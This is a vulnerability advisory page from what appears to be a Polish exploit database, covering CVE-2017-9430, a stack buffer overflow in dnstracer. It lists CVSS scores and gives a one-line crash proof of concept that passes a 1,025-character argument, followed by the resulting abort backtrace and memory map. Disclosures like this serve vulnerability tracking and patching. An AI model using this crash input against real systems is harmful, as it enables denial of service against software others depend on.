Index
Bugtraq
Pełna lista
Błędy
Sztuczki
Exploity
Dorks list
Tylko z CVE
Tylko z CWE
Bogus
Ranking
CVEMAP
Świeża lista CVE
Producenci
Produkty
Słownik CWE
Sprawdź nr. CVE
Sprawdź nr. CWE
Szukaj
W Bugtraq
W bazie CVE
Po autorze
Po nr. CVE
Po nr. CWE
Po producencie
Po produkcie
RSS
Bugtraq
CVEMAP
CVE Produkty
Tylko Błędy
Tylko Exploity
Tylko Dorks
Więcej
cIFrex
Facebook
Twitter
Donate
O bazie
Lang
Polish
English
Submit
DNSTracer Stack-based Buffer Overflow
2017.06.05
Hosein Askari
(CA)
Risk:
High
Local:
Yes
Remote:
No
CVE:
CVE-2017-9430
CWE:
CWE-119
Ogólna skala CVSS:
7.5/10
Znaczenie:
6.4/10
Łatwość wykorzystania:
10/10
Wymagany dostęp:
Zdalny
Złożoność ataku:
Niska
Autoryzacja:
Nie wymagana
Wpływ na poufność:
Częściowy
Wpływ na integralność:
Częściowy
Wpływ na dostępność:
Częściowy
################ #Exploit Title: DNSTracer Stack-based Buffer Overflow #CVE: CVE-2017-9430 #CWE: CWE-119 #Exploit Author: Hosein Askari #Vendor HomePage: http://www.mavetju.org #Version : 1.8.1 #Tested on: Parrot OS #Category: Application #Author Mail : hosein.askari@aol.com #Description: Stack-based buffer overflow in dnstracer through 1.9 allows attackers to cause a denial of service (application crash) or possibly have unspecified other impact via a command line with a long name argument that is mishandled in a strcpy call for argv[0]. An example threat model is a web application that launches dnstracer with an untrusted name string. ############################### #dnstracer -v $(python -c 'print "A"*1025') *** buffer overflow detected ***: dnstracer terminated ======= Backtrace: ========= /lib/x86_64-linux-gnu/libc.so.6(+0x70bcb)[0x7ff6e79edbcb] /lib/x86_64-linux-gnu/libc.so.6(__fortify_fail+0x37)[0x7ff6e7a76037] /lib/x86_64-linux-gnu/libc.so.6(+0xf7170)[0x7ff6e7a74170] /lib/x86_64-linux-gnu/libc.so.6(+0xf64d2)[0x7ff6e7a734d2] dnstracer(+0x2c8f)[0x5634368aac8f] /lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xf1)[0x7ff6e799d2b1] dnstracer(+0x2fca)[0x5634368aafca] ======= Memory map: ======== 5634368a8000-5634368b0000 r-xp 00000000 08:01 4850311 /usr/bin/dnstracer 563436aaf000-563436ab0000 r--p 00007000 08:01 4850311 /usr/bin/dnstracer 563436ab0000-563436ab1000 rw-p 00008000 08:01 4850311 /usr/bin/dnstracer 563436ab1000-563436ab3000 rw-p 00000000 00:00 0 563436c1d000-563436c3e000 rw-p 00000000 00:00 0 [heap] 7ff6e7766000-7ff6e777c000 r-xp 00000000 08:01 25823192 /lib/x86_64-linux-gnu/libgcc_s.so.1 7ff6e777c000-7ff6e797b000 ---p 00016000 08:01 25823192 /lib/x86_64-linux-gnu/libgcc_s.so.1 7ff6e797b000-7ff6e797c000 r--p 00015000 08:01 25823192 /lib/x86_64-linux-gnu/libgcc_s.so.1 7ff6e797c000-7ff6e797d000 rw-p 00016000 08:01 25823192 /lib/x86_64-linux-gnu/libgcc_s.so.1 7ff6e797d000-7ff6e7b12000 r-xp 00000000 08:01 25823976 /lib/x86_64-linux-gnu/libc-2.24.so 7ff6e7b12000-7ff6e7d11000 ---p 00195000 08:01 25823976 /lib/x86_64-linux-gnu/libc-2.24.so 7ff6e7d11000-7ff6e7d15000 r--p 00194000 08:01 25823976 /lib/x86_64-linux-gnu/libc-2.24.so 7ff6e7d15000-7ff6e7d17000 rw-p 00198000 08:01 25823976 /lib/x86_64-linux-gnu/libc-2.24.so 7ff6e7d17000-7ff6e7d1b000 rw-p 00000000 00:00 0 7ff6e7d1b000-7ff6e7d3e000 r-xp 00000000 08:01 25823455 /lib/x86_64-linux-gnu/ld-2.24.so 7ff6e7f13000-7ff6e7f15000 rw-p 00000000 00:00 0 7ff6e7f3a000-7ff6e7f3e000 rw-p 00000000 00:00 0 7ff6e7f3e000-7ff6e7f3f000 r--p 00023000 08:01 25823455 /lib/x86_64-linux-gnu/ld-2.24.so 7ff6e7f3f000-7ff6e7f40000 rw-p 00024000 08:01 25823455 /lib/x86_64-linux-gnu/ld-2.24.so 7ff6e7f40000-7ff6e7f41000 rw-p 00000000 00:00 0 7ffded62d000-7ffded64e000 rw-p 00000000 00:00 0 [stack] 7ffded767000-7ffded769000 r--p 00000000 00:00 0 [vvar] 7ffded769000-7ffded76b000 r-xp 00000000 00:00 0 [vdso] ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall] Aborted
See this note in RAW Version
Tweet
Vote for this issue:
1
0
100%
0%
Thanks for you vote!
Thanks for you comment!
Your message is in quarantine 48 hours.
Comment it here.
Nick (*)
Email (*)
Video
Text (*)
(*) -
required fields.
Cancel
Submit
{{ x.nick }}
|
Date:
{{ x.ux * 1000 | date:'yyyy-MM-dd' }}
{{ x.ux * 1000 | date:'HH:mm' }}
CET+1
{{ x.comment }}
Show all comments
Copyright
2024
, cxsecurity.com
Back to Top